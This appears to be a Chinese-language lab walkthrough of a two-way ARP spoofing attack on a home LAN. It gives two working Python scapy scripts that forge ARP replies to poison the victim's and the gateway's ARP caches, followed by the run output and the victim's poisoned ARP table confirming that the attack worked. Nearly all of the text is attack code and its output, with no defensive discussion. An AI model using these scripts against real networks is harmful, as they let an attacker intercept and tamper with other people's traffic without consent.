攻击者IP :192.168.0.112 MAC:00:0c:29:ab:27:ff
被攻击者IP:192.168.0.104 MAC:00:23:14:ad:36:c0
网关IP :192.168.0.1 MAC:9c:21:6a:4f:cc:38
脚本文件a.py
欺骗 192.168.0.104主机告诉其网关MAC地址为攻击者
#!/usr/bin/env python
from scapy.all import *
srloop(ARP(hwsrc='00:0c:29:ab:27:ff',hwdst='00:23:14:ad:36:c0',psrc='192.168.0.1',pdst='192.168.0.104'))
脚本文件b.py
欺骗 网关192.168.0.1主机告诉192.168.0.104 MAC地址为攻击者MAC
#!/usr/bin/env python
from scapy.all import *
srloop(ARP(hwsrc='00:0c:29:ab:27:ff',hwdst='9c:21:6a:4f:cc:38',psrc='192.168.0.104',pdst='192.168.0.1'))
分别执行两个脚本:
root@kali:/dd/shell# python a.py
WARNING: No route found for IPv6 destination :: (no default route?)
RECV 1: ARP is at 00:23:14:ad:36:c0 says 192.168.0.104 / Padding
RECV 1: ARP is at 00:23:14:ad:36:c0 says 192.168.0.104 / Padding
RECV 1: ARP is at 00:23:14:ad:36:c0 says 192.168.0.104 / Padding
RECV 1: ARP is at 00:23:14:ad:36:c0 says 192.168.0.104 / Padding
RECV 1: ARP is at 00:23:14:ad:36:c0 says 192.168.0.104 / Padding
RECV 1: ARP is at 00:23:14:ad:36:c0 says 192.168.0.104 / Padding
root@kali:/dd/shell# python b.py
WARNING: No route found for IPv6 destination :: (no default route?)
RECV 1: ARP is at 9c:21:6a:4f:cc:38 says 192.168.0.1 / Padding
RECV 1: ARP is at 9c:21:6a:4f:cc:38 says 192.168.0.1 / Padding
RECV 1: ARP is at 9c:21:6a:4f:cc:38 says 192.168.0.1 / Padding
RECV 1: ARP is at 9c:21:6a:4f:cc:38 says 192.168.0.1 / Padding
RECV 1: ARP is at 9c:21:6a:4f:cc:38 says 192.168.0.1 / Padding
RECV 1: ARP is at 9c:21:6a:4f:cc:38 says 192.168.0.1 / Padding
RECV 1: ARP is at 9c:21:6a:4f:cc:38 says 192.168.0.1 / Padding
RECV 1: ARP is at 9c:21:6a:4f:cc:38 says 192.168.0.1 / Padding
此时被攻击者的arp表将会出现如下现,此时可看到arp表项网关192.168.0.1的mac地址和攻击者192.168.0.112的mac地址一样。可知欺骗成功。
C:\Users\Administrator>arp -a
接口: 192.168.0.104 --- 0xd
Internet 地址 物理地址 类型
192.168.0.1 00-0c-29-ab-27-ff 动态
192.168.0.80 00-14-6a-89-69-80 动态
192.168.0.100 5c-f9-38-39-9c-73 动态
192.168.0.112 00-0c-29-ab-27-f 动态
192.168.0.113 b8-27-eb-5d-b5-63 动态
192.168.0.210 84-2b-2b-b7-67-de 动态
192.168.0.230 00-25-b3-0b-a1-49 动态
192.168.0.255 ff-ff-ff-ff-ff-ff 静态
224.0.0.2 01-00-5e-00-00-02 静态
224.0.0.22 01-00-5e-00-00-16 静态
224.0.0.251 01-00-5e-00-00-fb 静态
224.0.0.252 01-00-5e-00-00-fc 静态
239.255.255.250 01-00-5e-7f-ff-fa 静态
再看下网关的arp表项,192.168.0.112和192.168.0.104的mac地址一样,可知欺骗成功。
至此,攻击者双向欺骗成功。